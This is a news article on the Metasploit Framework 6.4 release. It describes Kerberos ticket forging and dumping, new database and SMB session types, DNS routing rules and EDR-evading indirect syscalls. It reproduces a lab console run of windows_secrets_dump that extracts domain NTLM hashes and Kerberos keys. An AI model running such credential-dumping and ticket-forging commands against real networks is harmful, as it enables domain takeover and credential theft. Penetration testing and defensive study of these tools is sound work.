This ongoing competition is exhibited by the release of Framework 6.4, the latest Metasploit version. It advances cybersecurity with numerous new features and enhancements. Since the release of Metasploit version 6.3 a little more than a year ago, the Rapid7 team has not remained inactive.
Building on the strong foundation of its successor, the new Metasploit Framework 6.4 version offers major improvements along with many new features. This version demonstrates how Metasploit is dedicated to offering penetration testers & cybersecurity experts state-of-the-art tools.
Kerberos Improvements in the Metasploit Framework 6.4
This release's significant enhancements to the Kerberos authentication functionality are one of several of its features. Metasploit 6.4 provides many additional features, such as support for the diamond and sapphire techniques along with the classic golden & silver techniques, building on the first support introduced in version 6.3.
Keeping yourself updated with the latest Windows objectives, this improvement guarantees compatibility with Windows Server 2022. According to a recent report from Rapid7, Metasploit has just announced the release of Metasploit Framework 6.4 version.
In addition to this, the Metasploit 6.4 version adds a new module that functions similarly to the well-known Rubeus tool, enabling users to dump Kerberos tickets from a hacked host. This latest improvement is highly useful for imposing Unconstrained Delegation situations, adding to the weapons of cybersecurity experts.
An example of using the DOMAIN action & Kerberos authentication with the gather/windows_secrets_dump module is as follows:
msf6 auxiliary(gather/windows_secrets_dump) > run rhost=192.168.123.133 username=vagrant password=vagrant smb::auth=kerberos domaincontrollerrhost=192.168.123.133 smb::rhostname=dc01.demo.local domain=demo.local action=DOMAIN [*] Running module against 192.168.123.133 [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGT-Response [*] 192.168.123.133:445 - 192.168.123.133:445 - TGT MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_724176.bin [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response [*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130521_default_192.168.123.133_mit.kerberos.cca_878194.bin [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response [*] 192.168.123.133:445 - Opening Service Control Manager ... [*] 192.168.123.133:445 - Using cached credential for krbtgt/DEMO.LOCAL@DEMO.LOCAL. [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid TGS-Response [*] 192.168.123.133:445 - 192.168.123.133:445 - TGS MIT Credential Cache ticket saved to /Users/user/.msf4/loot/20240319130522_default_192.168.123.133_mit.kerberos.cca_113846.bin [+] 192.168.123.133:445 - 192.168.123.133:88 - Received a valid delegation TGS-Response [*] 192.168.123.133:445 - Bound to DRSR [*] 192.168.123.133:445 - Decrypting hash for user: CN=Administrator,CN=Users,DC=demo,DC=local [*] 192.168.123.133:445 - Decrypting hash for user: CN=Guest,CN=Users,DC=demo,DC=local [*] 192.168.123.133:445 - Decrypting hash for user: CN=krbtgt,CN=Users,DC=demo,DC=local [*] 192.168.123.133:445 - Decrypting hash for user: CN=vagrant,CN=Users,DC=demo,DC=local [*] 192.168.123.133:445 - Decrypting hash for user: CN=DC01,OU=Domain Controllers,DC=demo,DC=local [*] 192.168.123.133:445 - Decrypting hash for user: CN=DESKTOP-QUUL3FQV,CN=Computers,DC=demo,DC=local # SID's: Administrator: S-1-5-21-1242350107-3695253863-3717863007-500 ... # NTLM hashes: Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a::: ... # Full pwdump format: Administrator:500:aad3b435b51404eeaad3b435b51404ee:c3adff536329bc46a8db473dc318d54a:Disabled=false,Expired=false,PasswordNeverExpires=true,PasswordNotRequired=false,PasswordLastChanged=202309151519,LastLogonTimestamp=never,IsAdministrator=true,IsDomainAdmin=true,IsEnterpriseAdmin=true:: ... # Kerberos keys: Administrator:aes256-cts-hmac-sha1-96:f68d8df38809b402cf49799faf991e77d3d931235d1cfa20fab35d348c0fa6a6 … [*] 192.168.123.133:445 - Cleaning up... [*] Auxiliary module execution completed |
Chief Scientist at Rapid7, Raj Samani, tweeted today to thank the Metasploit community and team for their amazing work in releasing version 6.4 of the Metasploit Framework.
New Session Types & DNS Configuration
The improved way that the Metasploit framework handles DNS queries is another noteworthy development. With this version, customers can also choose the hostname resolution protocol, which is very helpful in pivoting scenarios. This improves operational security by ensuring that DNS searches for internal resources come from a hacked host rather than the user's machine.
Additionally, new PostgreSQL, MSSQL, MySQL, and SMB session types are introduced in Metasploit 6.4. These session types enable direct contact with SMB shares, including the ability to upload and receive files, as well as interactive queries with remote database instances. This enhancement increases efficiency and effectiveness by streamlining the process of executing several modules against a single session.
Instances of DNS configuration manipulation include:
dns add --rule *.lab.lan --session 1 --index 1 192.0.2.1 dns add --rule honeypot.lab.lan --index 2 black-hole dns add-static example2.lab.lan 192.0.2.201 dns add --index 1 --rule * static system 192.0.2.1 |
Viewing the Present Configuration:
msf6 > dns print Default search domain: N/A Default search list: * tor.example.com * localdomain Current cache size: 0 Resolver rule entries # Rule Resolver Comm channel - ---- -------- ------------ 1 *.lab.lan 192.0.2.1 Session 1 2 honeypot.lab.lan black-hole N/A 3 * . \_ static N/A . \_ 10.4.5.45 . \_ 10.3.20.98 Static hostnames Hostname IPv4 Address IPv6 Address -------- ------------ ------------ example.lab.lan 192.0.2.200 example2.lab.lan 192.0.2.201 |
Support for Indirect Syscalls and Enhancements to Discoverability
Indirect syscalls are a common way for security software to elude dynamic analysis and EDR/AV detection. Metasploit 6.4 supports this technique. The main goal of this upgrade is to make Metasploit operations more stealthy by replacing Win32 API calls with indirect syscalls instead of their equivalent native APIs.
Metasploit 6.4 brings enhancements to module discoverability to help users navigate the numerous modules available within the framework. It is now simpler for users to locate the tools they require for their jobs thanks to the new Hierarchical Search feature, which matches extra fields within modules. For instance, since it is a module operation, this will result in the auxiliary/admin/kerberos/forge_ticket module appearing when the user searches for forge_golden:
msf6 auxiliary(scanner/mysql/mysql_hashdump) > search kerberos forge Matching Modules # Name Disclosure Date Rank Check Description - ---- --------------- ---- ----- ----------- 0 auxiliary/admin/kerberos/forge_ticket . normal No Kerberos Silver/Golden/Diamond/Sapphire Ticket Forging 1 \_ action: FORGE_DIAMOND . . . Forge a Diamond Ticket 2. \_ action: FORGE_GOLDEN . . . Forge a Golden Ticket 3. \_ action: FORGE_SAPPHIRE . . . Forge a Sapphire Ticket 4. \_ action: FORGE_SILVER . . . Forge a Silver Ticket 5. \_ AKA: Ticketer . . . . 6. \_AKA: Klist . . . . 7 auxiliary/admin/kerberos/ms14_068_kerberos_checksum 2014-11-18 normal No MS14-068 Microsoft Kerberos Checksum Validation Deficiency Use a module's name or index to interact with it. Use 7 or auxiliary/admin/Kerberos/ms14_068_kerberos_checksum msf6 auxiliary(scanner/mysql/mysql_hashdump) >, for instance, if you have information 7. |
Another significant step toward becoming one of the most popular penetration testing tools has been reached with the release of Metasploit Framework 6.4. Metasploit keeps providing cybersecurity experts with the tools they need to defend against the always-changing dangers in the digital world with its updated capabilities and enhancements. Tools like Metasploit Framework 6.4 are crucial for preserving the security of digital infrastructures across the globe as cyber threats become more sophisticated.
Did you find this article interesting? Join our TTB Community for more intriguing articles & updates.